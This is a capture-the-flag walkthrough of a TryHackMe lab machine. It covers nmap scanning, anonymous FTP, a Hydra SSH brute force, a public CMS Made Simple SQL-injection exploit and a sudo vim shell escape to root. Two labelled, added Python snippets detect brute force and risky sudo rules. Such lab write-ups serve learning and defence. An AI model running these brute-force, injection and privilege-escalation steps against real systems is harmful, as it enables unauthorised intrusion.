This is a writeup for EasyCTF on TryHackMe

The basics

To make the magic happen, first do the thingies that allow you to connect to the TryHackMe network, like booting up your VPN and... Is your computer on as well?

Good? Good.

Okay.

Oh, and a disclaimer: The easy answers are disclosed, but the answers where you need to put some effort into it are redacted. With that said, I wish you happy hacking!


Tasks

#1 How many services are running under port 1000?

To answer that, let's bring out the big guns right off the bat. Nmap? Nmap.

So, let's fire it up:

nmap -sC -sV -oN nmap/initial <ip>

And we get:

Nmap 7.80 scan initiated Sun Aug 30 13:33:19 2020 as: nmap -sC -sV -oN nmap/initial <ip>
Nmap scan report for <ip>
Host is up (0.062s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ffff:<ip>
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 29:42:69:14:9e:ca:d9:17:98:8c:27:72:3a:cd:a9:23 (RSA)
|   256 9b:d1:65:07:51:08:00:61:98:de:95:ed:3a:e3:81:1c (ECDSA)
|_  256 12:65:1b:61:cf:4d:e5:75:fe:f4:e8:d4:6e:10:2a:f6 (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Sun Aug 30 13:34:02 2020 -- 1 IP address (1 host up) scanned in 42.94 seconds

So, nmap shows us three open ports: 21, 80, and 2222. Only 21 and 80 are below 1000.

Answer: 2




#2 What is running on the higher port?

Let's see...

2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)

SSH running on port 2222? Sure, why not.

Answer: ssh




#5 What's the password?

What's the pass...? Hey, wait a minute, WAIT A MINUTE! HOLD ON! Task number 5?!? Why did you skip tasks 3 and 4?!?

I know, I know... I'm just trying to show that there's more than a single way to get access to the machine. So, I'll first show the way in through FTP, and then I'll tackle the application (the intended way) as well. So:



# Getting through FTP

From the initial nmap scan we can find this:

21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ffff:<ip>
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status

Thus:

> FTP is open
> We can log in as "ftp" (pretty much an anonymous user)

So, anything interesting here?

$ ftp <ip>
Connected to <ip>.
220 (vsFTPd 3.0.3)
Name (<ip>:by7e): ftp
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 .
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.

Hm... A public folder. That's expected for anonymous FTP. Is there anything in there?

ftp> cd pub
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 .
drwxr-xr-x    3 ftp      ftp          4096 Aug 17  2019 ..
-rw-r--r--    1 ftp      ftp           166 Aug 17  2019 ForMitch.txt
226 Directory send OK.

Hello, what's this? Let's download and examine the file...

ftp> get ForMitch.txt
ftp> 221 Goodbye.

$ cat ForMitch.txt
Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess

So we now know two things: we have a name, Mitch, and his password(s) suck. Intriguing. Let's bust out our beloved Hydra, plug it into the almighty rockyou dictionary, and point it at port 2222.

$ hydra ssh://<ip>:2222 -l mitch -P /opt/rockyou.txt

Aaaaand --

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-30 14:43:13
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://<ip>:2222/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://mitch@<ip>:2222
[INFO] Successful, password authentication is supported by ssh://<ip>:2222
[2222][ssh] host: <ip>   login: mitch   password: [redacted]
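The defender's view of that Hydra run, as an added example that is not part of the original writeup: sshd writes one "Failed password" line per attempt to auth.log, and a burst of them from a single source inside a short window is exactly what a 16-task Hydra job looks like. The host name, IPs and log lines are constructed; the year is assumed because syslog timestamps omit it.

```python
import re
from collections import defaultdict
from datetime import datetime

THRESHOLD = 5   # failed logins from one source ...
WINDOW = 60     # ... inside this many seconds raises an alert
YEAR = 2020     # syslog lines carry no year; assumed for the constructed sample
# sshd's failure line; "invalid user" appears when the account does not exist.
FAILED = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
# Constructed auth.log excerpt: one real login, a burst from 10.10.14.7, one stray failure.
SAMPLE_LOG = """\
Aug 30 14:43:13 easyctf sshd[1201]: Accepted password for mitch from 10.10.14.5 port 40100 ssh2
Aug 30 14:43:14 easyctf sshd[1204]: Failed password for mitch from 10.10.14.7 port 40122 ssh2
Aug 30 14:43:14 easyctf sshd[1205]: Failed password for mitch from 10.10.14.7 port 40124 ssh2
Aug 30 14:43:15 easyctf sshd[1206]: Failed password for mitch from 10.10.14.7 port 40126 ssh2
Aug 30 14:43:15 easyctf sshd[1207]: Failed password for mitch from 10.10.14.7 port 40128 ssh2
Aug 30 14:43:16 easyctf sshd[1208]: Failed password for mitch from 10.10.14.7 port 40130 ssh2
Aug 30 14:43:16 easyctf sshd[1209]: Failed password for mitch from 10.10.14.7 port 40132 ssh2
Aug 30 14:50:01 easyctf sshd[1300]: Failed password for invalid user admin from 10.10.14.9 port 41000 ssh2
"""


def parse_failures(log_text):
    """Yield (timestamp, source_ip, user) for every failed-password line."""
    for line in log_text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(f"{YEAR} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            yield ts, m.group("ip"), m.group("user")


def brute_force_sources(log_text, threshold=THRESHOLD, window=WINDOW):
    """Return {ip: total_failures} for sources with >= threshold failures in one window."""
    per_ip = defaultdict(list)
    for ts, ip, _user in parse_failures(log_text):
        per_ip[ip].append(ts)
    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()            # the sliding window needs chronological order
        start = 0
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window:
                start += 1       # drop attempts that fell out of the window
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged
```

With PasswordAuthentication disabled in sshd_config the same burst shows up as "Connection closed by authenticating user" lines instead, so a production rule should match both.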

We have a winner! Now what? Let's deal with this one first:



#5 What's the password?

Answer: [redacted]



Hey! You said--

I'm not done.

The other, intended way, is slightly different. Let's tackle that now.



# Getting through application

During our initial scan we find this:

80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/ /openemr-5_0_1_3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

robots.txt can often reveal useful information, but...

User-agent: *
Disallow: /

Disallow: /openemr-5_0_1_3

This time it's nothing. Zip. Nil. Zilch. 404. The folder doesn't exist. There's nothing there. Okay; time for alternate routes - let's break out gobuster (no, I have no love for dirbuster. CLI FTW!)

Anyways --

gobuster dir -u http://<ip>/ -w /usr/share/wordlists/dirb/common.txt -x php,py

/.hta (Status: 403)
/.hta.py (Status: 403)
/.hta.php (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.py (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.py (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
+-----------------------+
| /simple (Status: 301) |
+-----------------------+

Simple, huh? Let's look at... Ohhh... CMS made simple? And there's a version of it in the footer, and, hm, let's see if there's some kind of expl--

$ searchsploit cms made simple
----------------------------------------------------------------------------------------
 Exploit Title
----------------------------------------------------------------------------------------
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execution
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Poisoning
+------------------------------------------+
| CMS Made Simple < 2.2.10 - SQL Injection |
+------------------------------------------+
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload
----------------------------------------------------------------------------------------

OH, HELLO!

So, a quick Google search about the injection should yield the correct CVE, and the tool to extract credentials:

https://www.exploit-db.com/exploits/46635

#3 What's the CVE you're using against the application?

Answer: [redacted]


Downloading and running the Python code extracts the credentials (personal note: this exploit runs on Python 2, not 3. Maybe 2to3 would work on it, but ehhh...):

$ python cmssmadesimple_xploit.py -u http://<ip>/simple

[+] Salt for password found: [redacted]
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: [redacted]

Hint: You can use basically any online password cracker out there. It's super simple.

#4 To what kind of vulnerability is the application vulnerable?

Answer: sqli



#5 What's the password?

Answer: [still redacted]



#6 Where can you login with the details obtained?

Well, we've got the username and the password, along with the SSH port. Let's combine those and answer the question:

Answer: ssh



#7 What's the user flag?

Aha! Now that we're in the machine we can do the cool stuff! So, let's do the cool stuff:

$ ssh mitch@<ip> -p2222
mitch@<ip>'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

$ ls
user.txt
$ cat user.txt
[redacted]

Answer: [redacted]



#8 Is there any other user in the home directory? What's its name?

$ ls /home
mitch [redacted]

Answer: [redacted]



#9 What can you leverage to spawn a privileged shell?

Hm, let's see...

$ find / -perm /4000 2>/dev/null

This yields nothing. HOWEVER, there's always one more card up my sleeve (I have a lot of cards, okay? I may also have a few too many sleeves.)

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

Gotcha!

Answer: Vim



And escaping vim is quite simple:

$ sudo vim

Within vim you can execute commands with :!, for example :!/bin/sh. You enter the shell and -- game over.

# cd /root
# ls
# cat root.txt
[redacted]
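An audit-side counterpart to that sudo -l check, as an added example that is not the writeup's code: it parses the "(runas) TAGS: command" entries and flags root entries that need no password and run a binary which can hand back a shell, which is what task #9 turns on. The vim entry is the writeup's own; the apt-get entry is constructed for contrast.

```python
import re

# sudo -l output: the first entry is from the writeup, the second is constructed.
SAMPLE_SUDO_L = """\
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/apt-get update
"""

# Binaries that can run shell commands from inside (vim via ":!", as the
# writeup shows). Only vim is named on the page; extend from your own baseline.
SHELL_CAPABLE = {"/usr/bin/vim"}

# One sudoers entry: "(runas) TAG: TAG: command args"; tags are optional.
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(text):
    """Return a list of {runas, nopasswd, command} dicts from sudo -l output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # header lines such as "User mitch may run ..." carry no entry
        tags = {t.strip(":") for t in m.group("tags").split()}
        entries.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD" in tags,
            "command": m.group("cmd").strip(),
        })
    return entries


def risky_entries(entries):
    """Root + NOPASSWD + shell-capable binary: a direct path to a root shell."""
    return [
        e for e in entries
        if e["runas"] == "root" and e["nopasswd"]
        and e["command"].split()[0] in SHELL_CAPABLE
    ]


if __name__ == "__main__":
    for e in risky_entries(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"flag: {e['command']} runs as {e['runas']} without a password")
```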

Which brings us to our last question:

#10 What's the root flag?

Answer: [still redacted]




That's it!

-- by7e
